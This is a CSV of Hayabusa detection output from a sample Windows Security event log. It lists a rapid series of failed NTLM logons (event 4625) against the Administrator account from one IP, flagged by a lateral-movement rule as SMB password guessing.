2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOfkvLSo2HuhMtvk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y9DQUhPQHvvwAO0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yao1JM0tSFv5IHnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXGm63wiZz3ZYFb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: izvPgZCO2GRVLhId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iI9zO2o7jd922pfK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnAGy86My6hVwt4J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhFTzONSVEziRtgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdEv4ooC8AApqU1T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxFGRBKVK732Aeu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITg8QH90LKkAQMLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8YKCN2uxmJtYxdW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lcVIqrTQbNLFW7Cr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: taZx68l1ci0i2XB0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Jjy0gZhZCc9dVGd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S1DxOWcNytmxHfxl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGRFWos3MJeQ0oAr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I3YXVTiQAGbf57TH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eWNsBwoGd36krY2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HIobpWCoOHdD76lL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W91ruUEdXwRcMxVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6PEs7fp97cYFf4vx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQelUX0kwLfpJnr0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t88CBspQqbiO1IPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zELW2Upo3jRCIqJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfcyJGLYmu93JBIL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3t2nKPZHZvcXM3QA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oiDRonqdEM2YJvz9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wJPF4GUypkDkTz56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cd5YRVIoXx8LoYpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H49I2Xp2Gz1Jj0Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMSWWzskoRfYBGny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLm2PolKMBsYkPnN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZjHWhG2rXzYWskz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FOZzVedHYODB5Yvd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVaRybjI4HdZV0Zs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tTcl30MvvycjFcQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVZqbCr9EwmV4gNE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zVwhii0TVmCkpDI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Tx04CPPVa6WYY9G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gHyefIGqhIIy3ZI9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wrietoh4wgXcEvNd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9WW0Y5PW2JfCCdyR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmXsMJ0ELK4qiNY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeftUqriSoxCgmDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60JE9WQQ8N00j65B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0rt2yVAEH6V4IIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pay98C2Gr1di7qQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8TyPDYm9QCAmqj7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Dw3iK7DQMVXy8LW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BMuO0QEkxpKRv4Vl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaHECaQDXCXQc9Xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ewXT2VcARiaNLIxJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGSTrm4AOojs7So0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wVTBSk0Q65LkaTqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NjFN51w3T4VwuWa5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KG7a88h48ZEyOuYw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ksKuTSGukc5em3B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPEMcGV6ZR92sWNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iBQ6sKrRjb7BsySN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gDFnG1gv7jOeIQ0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdFKkcNpkfAScnkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IAYbV4ioewwkZSmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bQ2Dxd6nlgSXJpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: havLyoVCfdCqzrqO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b2vZLhz19pXrq9iE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4TSN93DrSWb1ah4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QwFyrxiceLRTD9rI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARbqo84Mr5T3ltRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34HpQJO17IDWber9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bSSbqOtdSeH58oIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EMvTo7fU6J468WE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8gzx6Vr9LoInM1df : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwXC2S4HwdwNE6SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pQa1WxSt3bj9LEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
